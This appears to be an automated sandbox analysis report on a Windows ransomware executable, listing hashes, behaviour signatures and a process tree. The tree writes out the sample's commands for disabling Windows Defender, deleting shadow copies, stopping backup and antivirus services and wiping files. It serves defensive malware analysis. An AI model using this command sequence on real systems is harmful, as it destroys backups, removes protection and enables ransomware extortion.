Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-02-2024 00:12

General

  • Target

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

  • Size

    87KB

  • MD5

    d6d956267a268c9dcf48445629d2803e

  • SHA1

    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

  • SHA256

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

  • SHA512

    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

  • SSDEEP

    1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
    "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:520
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4948
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2336
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2280
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      2⤵
        PID:3252
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" Delete Shadows /all /quiet
        2⤵
        • Interacts with shadow copies
        PID:4704
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        2⤵
        • Interacts with shadow copies
        PID:4464
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
        2⤵
        • Interacts with shadow copies
        PID:2728
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        2⤵
        • Interacts with shadow copies
        PID:3288
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
        2⤵
        • Interacts with shadow copies
        PID:1648
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        2⤵
        • Interacts with shadow copies
        PID:2680
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
        2⤵
        • Interacts with shadow copies
        PID:4316
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        2⤵
        • Interacts with shadow copies
        PID:4600
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
        2⤵
        • Interacts with shadow copies
        PID:2092
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        2⤵
        • Interacts with shadow copies
        PID:4852
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
        2⤵
        • Interacts with shadow copies
        PID:4484
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        2⤵
        • Interacts with shadow copies
        PID:3096
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
        2⤵
        • Interacts with shadow copies
        PID:4556
      • C:\Windows\SYSTEM32\vssadmin.exe
        "vssadmin.exe" Delete Shadows /all /quiet
        2⤵
        • Interacts with shadow copies
        PID:1504
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mydesktopservice.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:312
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mydesktopqos.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
      • C:\Windows\SYSTEM32\taskkill.exe
        "taskkill.exe" /IM mspub.exe /F
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3048
      • C:\Windows\SYSTEM32\sc.exe
        "sc.exe" config SstpSvc start= disabled
        2⤵
        • Launches sc.exe
        PID:4868
      • C:\Windows\SYSTEM32\sc.exe
        "sc.exe" config SQLWriter start= disabled
        2⤵
        • Launches sc.exe
        PID:4996
      • C:\Windows\SYSTEM32\sc.exe
        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
        2⤵
        • Launches sc.exe
        PID:4488
      • C:\Windows\SYSTEM32\sc.exe
        "sc.exe" config SQLTELEMETRY start= disabled
        2⤵
        • Launches sc.exe
        PID:2980
      • C:\Windows\SYSTEM32\net.exe
        "net.exe" stop sophos /y
        2⤵
          PID:5044
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop sophos /y
            3⤵
              PID:6404
          • C:\Windows\SYSTEM32\net.exe
            "net.exe" stop CAARCUpdateSvc /y
            2⤵
              PID:756
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                3⤵
                  PID:6812
              • C:\Windows\SYSTEM32\net.exe
                "net.exe" stop CASAD2DWebSvc /y
                2⤵
                  PID:3216
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                    3⤵
                      PID:6768
                  • C:\Windows\SYSTEM32\net.exe
                    "net.exe" stop AcronisAgent /y
                    2⤵
                      PID:4364
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop AcronisAgent /y
                        3⤵
                          PID:6528
                      • C:\Windows\SYSTEM32\net.exe
                        "net.exe" stop AcrSch2Svc /y
                        2⤵
                          PID:5116
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 stop AcrSch2Svc /y
                            3⤵
                              PID:6804
                          • C:\Windows\SYSTEM32\net.exe
                            "net.exe" stop BackupExecRPCService /y
                            2⤵
                              PID:3812
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 stop BackupExecRPCService /y
                                3⤵
                                  PID:6716
                              • C:\Windows\SYSTEM32\net.exe
                                "net.exe" stop BackupExecManagementService /y
                                2⤵
                                  PID:2500
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 stop BackupExecManagementService /y
                                    3⤵
                                      PID:6496
                                  • C:\Windows\SYSTEM32\net.exe
                                    "net.exe" stop BackupExecJobEngine /y
                                    2⤵
                                      PID:4588
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                        3⤵
                                          PID:6796
                                      • C:\Windows\SYSTEM32\net.exe
                                        "net.exe" stop BackupExecDiveciMediaService /y
                                        2⤵
                                          PID:4656
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                            3⤵
                                              PID:6636
                                          • C:\Windows\SYSTEM32\net.exe
                                            "net.exe" stop BackupExecAgentBrowser /y
                                            2⤵
                                              PID:1440
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                3⤵
                                                  PID:6624
                                              • C:\Windows\SYSTEM32\net.exe
                                                "net.exe" stop BackupExecAgentAccelerator /y
                                                2⤵
                                                  PID:944
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                    3⤵
                                                      PID:6684
                                                  • C:\Windows\SYSTEM32\net.exe
                                                    "net.exe" stop BackupExecVSSProvider /y
                                                    2⤵
                                                      PID:4920
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                        3⤵
                                                          PID:6708
                                                      • C:\Windows\SYSTEM32\net.exe
                                                        "net.exe" stop PDVFSService /y
                                                        2⤵
                                                          PID:2964
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop PDVFSService /y
                                                            3⤵
                                                              PID:6936
                                                          • C:\Windows\SYSTEM32\net.exe
                                                            "net.exe" stop veeam /y
                                                            2⤵
                                                              PID:4356
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop veeam /y
                                                                3⤵
                                                                  PID:6504
                                                              • C:\Windows\SYSTEM32\net.exe
                                                                "net.exe" stop VeeamNFSSvc /y
                                                                2⤵
                                                                  PID:4196
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                    3⤵
                                                                      PID:6660
                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                    "net.exe" stop VeeamDeploymentService /y
                                                                    2⤵
                                                                      PID:2792
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                        3⤵
                                                                          PID:6744
                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                        "net.exe" stop VeeamTransportSvc /y
                                                                        2⤵
                                                                          PID:4424
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                            3⤵
                                                                              PID:6848
                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                            "net.exe" stop VSNAPVSS /y
                                                                            2⤵
                                                                              PID:3764
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                3⤵
                                                                                  PID:6788
                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                "net.exe" stop stc_raw_agent /y
                                                                                2⤵
                                                                                  PID:1240
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                                    3⤵
                                                                                      PID:6396
                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                    "net.exe" stop zhudongfangyu /y
                                                                                    2⤵
                                                                                      PID:1244
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                                        3⤵
                                                                                          PID:6652
                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                        "net.exe" stop YooIT /y
                                                                                        2⤵
                                                                                          PID:3460
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 stop YooIT /y
                                                                                            3⤵
                                                                                              PID:6480
                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                            "net.exe" stop YooBackup /y
                                                                                            2⤵
                                                                                              PID:2704
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 stop YooBackup /y
                                                                                                3⤵
                                                                                                  PID:6736
                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                "net.exe" stop QBCFMonitorService /y
                                                                                                2⤵
                                                                                                  PID:316
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                                                                    3⤵
                                                                                                      PID:6676
                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                    "net.exe" stop Intuit.QuickBooks.FCS /y
                                                                                                    2⤵
                                                                                                      PID:4156
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                                                                        3⤵
                                                                                                          PID:6512
                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                        "net.exe" stop QBIDPService /y
                                                                                                        2⤵
                                                                                                          PID:820
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 stop QBIDPService /y
                                                                                                            3⤵
                                                                                                              PID:6760
                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                            "net.exe" stop QBFCService /y
                                                                                                            2⤵
                                                                                                              PID:200
                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                C:\Windows\system32\net1 stop QBFCService /y
                                                                                                                3⤵
                                                                                                                  PID:6536
                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                "net.exe" stop RTVscan /y
                                                                                                                2⤵
                                                                                                                  PID:4968
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop RTVscan /y
                                                                                                                    3⤵
                                                                                                                      PID:6780
                                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                                    "net.exe" stop SavRoam /y
                                                                                                                    2⤵
                                                                                                                      PID:4184
                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                        C:\Windows\system32\net1 stop SavRoam /y
                                                                                                                        3⤵
                                                                                                                          PID:6520
                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                        "net.exe" stop ccSetMgr /y
                                                                                                                        2⤵
                                                                                                                          PID:3600
                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                          "net.exe" stop ccEvtMgr /y
                                                                                                                          2⤵
                                                                                                                            PID:1852
                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                            "net.exe" stop DefWatch /y
                                                                                                                            2⤵
                                                                                                                              PID:3596
                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                              "net.exe" stop NetBackup BMR MTFTP Service /y
                                                                                                                              2⤵
                                                                                                                                PID:4072
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                                                                                                                                  3⤵
                                                                                                                                    PID:6964
                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                  "net.exe" stop BMR Boot Service /y
                                                                                                                                  2⤵
                                                                                                                                    PID:4684
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop BMR Boot Service /y
                                                                                                                                      3⤵
                                                                                                                                        PID:6752
                                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                                      "net.exe" stop mfewc /y
                                                                                                                                      2⤵
                                                                                                                                        PID:4672
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop mfewc /y
                                                                                                                                          3⤵
                                                                                                                                            PID:6972
                                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                                          "net.exe" stop McAfeeDLPAgentService /y
                                                                                                                                          2⤵
                                                                                                                                            PID:4148
                                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                                            "net.exe" stop avpsus /y
                                                                                                                                            2⤵
                                                                                                                                              PID:2492
                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                C:\Windows\system32\net1 stop avpsus /y
                                                                                                                                                3⤵
                                                                                                                                                  PID:6668
                                                                                                                                              • C:\Windows\System32\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                                                2⤵
                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                PID:4412
                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                2⤵
                                                                                                                                                  PID:4372
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping 127.0.0.7 -n 3
                                                                                                                                                    3⤵
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:4092
                                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                                    fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5216
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:7008
                                                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5556
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop ccEvtMgr /y
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5172
                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                        C:\Windows\system32\net1 stop DefWatch /y
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6380
                                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                                          C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6348
                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                            C:\Windows\system32\net1 stop ccSetMgr /y
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6336

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                              Filesize

                                                                                                                                                              446B

                                                                                                                                                              MD5

                                                                                                                                                              da44bcd88d539fd3fc4bda9865b72351

                                                                                                                                                              SHA1

                                                                                                                                                              1d53a187fcd74fca275f3e43bc1132ae6098a838

                                                                                                                                                              SHA256

                                                                                                                                                              4fd850e5748d4d3474af8960ea136c123577dc4c069afbd89983ba9267d7bfeb

                                                                                                                                                              SHA512

                                                                                                                                                              c1759b95c030bbe46228ded464eebc49520e172d269645778f7beb4ef031006f757de226d800c77feb826770534c0706beb6e78eedc036f0872a529b2b37976c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                              Filesize

                                                                                                                                                              3KB

                                                                                                                                                              MD5

                                                                                                                                                              8592ba100a78835a6b94d5949e13dfc1

                                                                                                                                                              SHA1

                                                                                                                                                              63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                                                              SHA256

                                                                                                                                                              fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                                                              SHA512

                                                                                                                                                              87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              f7638f97291b998fec3e5048db9fd543

                                                                                                                                                              SHA1

                                                                                                                                                              2f385d6c8a11632651b9a19e531a701887518078

                                                                                                                                                              SHA256

                                                                                                                                                              2d89206c899bdc5063eb65e2b9a84869ae52c6f15b5afe094da55ed514d26804

                                                                                                                                                              SHA512

                                                                                                                                                              574c678efa3116b6394f213a1cbe517f78b29082eb428cac112b23477a2bd4d9c6e47a09305c315561a9d837d0e299e871b918dce3e7837428a73d6dcabddba5

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              51d76d33ee2702c9e24f00f70ee84b69

                                                                                                                                                              SHA1

                                                                                                                                                              477084f0de4eb0a6445a86ddb2b19b884c8ac4f1

                                                                                                                                                              SHA256

                                                                                                                                                              10b05c9f707a0aeb78ae91de771ac0930fdf9709777829478629e13ff1a635cf

                                                                                                                                                              SHA512

                                                                                                                                                              a01425ab9f7a250f32344321790c2e7fc5e9ce1042a0750ab57611023bef562b401de78f3708df2e63349fff38a380981d3dfbbaa264f497d370d0f660e7991b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              abc5f737f4dc9fe14f7222f3af5f420b

                                                                                                                                                              SHA1

                                                                                                                                                              347d1a76d783d44a02b51226505db1b2d1bf19d5

                                                                                                                                                              SHA256

                                                                                                                                                              757d1d5a24be5fb65758ba3cbdf3b4cafacba46f8bff7a59e2f394f0d1c43221

                                                                                                                                                              SHA512

                                                                                                                                                              8fb0f6bba6cbdbd612dfab26cab7d083844e9d539e50bf0b43c2faf44c8b6bfcdbf0747cdab6e2fca0849fc38fbf1c7a86ed3fe89e825c164297cb7848b34332

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              56c691b7ad59f9b0e6faa9f493f0705d

                                                                                                                                                              SHA1

                                                                                                                                                              9b05061abc089c34a7af4ac410c523fae2749a8c

                                                                                                                                                              SHA256

                                                                                                                                                              d5d43b645de3c572326835dadb92ea17232bc7b97c656da8d841dac7409077ac

                                                                                                                                                              SHA512

                                                                                                                                                              c3199b78161650fe413a5b7f50e9af9a26f26b70fe65b33713a8fafbfdec605569769ab002177b71444fec66e27e43f7ab8ec2372874491a0188953880dc9bf9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              de2297947d9500458bcf7409b43727be

                                                                                                                                                              SHA1

                                                                                                                                                              4cb3cb581db1af7b32f735d52c735c014592f0f6

                                                                                                                                                              SHA256

                                                                                                                                                              65300d54363c96692fdc02117a18e40d94ed7cdcd155a6952895ee0f40d22ecc

                                                                                                                                                              SHA512

                                                                                                                                                              b30a2b20b3a932f1a8d221fb025615614731e5c1d6c5a06e26c92f73c736e49e9df50b123898dceff31ffc58e29b8e3710ec51996700a1988d12a5c36ea7bdfe

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              f94062d467a1ce0952b2579bb5189448

                                                                                                                                                              SHA1

                                                                                                                                                              bd8f0ce4978e262d917350e50fd4b136ab8fec0c

                                                                                                                                                              SHA256

                                                                                                                                                              e18481f284132328e5f2cd27fe25834a8263a0edb98a12287dfdad0a5baa07b3

                                                                                                                                                              SHA512

                                                                                                                                                              1c053236c4440ee5efdaf027e6ac3dedf3fe4d5167f5203baf98bcffa5c8e2896ced5e5c806a00d6a88deb9f2c3e0391ba7197ac431e4dc8ad38768f9c11080b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              0f5cdf701501a02ff9c3dbe1730c919a

                                                                                                                                                              SHA1

                                                                                                                                                              79123c77622d1489c07c59eb6a308202a9954932

                                                                                                                                                              SHA256

                                                                                                                                                              2ea981842c4c31c94591d668290e15698695d87859d6dd6d6a55aaeebb245eb2

                                                                                                                                                              SHA512

                                                                                                                                                              bb7e46e58f229b302fe34a93328c949e66d30239905e45530f8e0a490c2014863af75a837c53d8bf2e4ec9b24ef3808bdd924307ac9d5f150d3368fc9041bcc2

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              be6b634c6e92c74b4b5eaf8aeaacca9e

                                                                                                                                                              SHA1

                                                                                                                                                              01da3bb6fd1ec35f4f6a7172598afb7a499d499f

                                                                                                                                                              SHA256

                                                                                                                                                              97a9c37c33b0728c87774718b3bf84d1f34f348e506fcc7660d81910b148f0ab

                                                                                                                                                              SHA512

                                                                                                                                                              3423e13fdd2bbfc7939f5ba16c5af44c41734dea18d1eff093757a9573db8d87b608d0b4e26f9c2d95fffb17a8ac677b388790172d15b8da6109d7ff4b7d7704

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34o0bro1.5jj.ps1

                                                                                                                                                              Filesize

                                                                                                                                                              1B

                                                                                                                                                              MD5

                                                                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                              SHA1

                                                                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                              SHA256

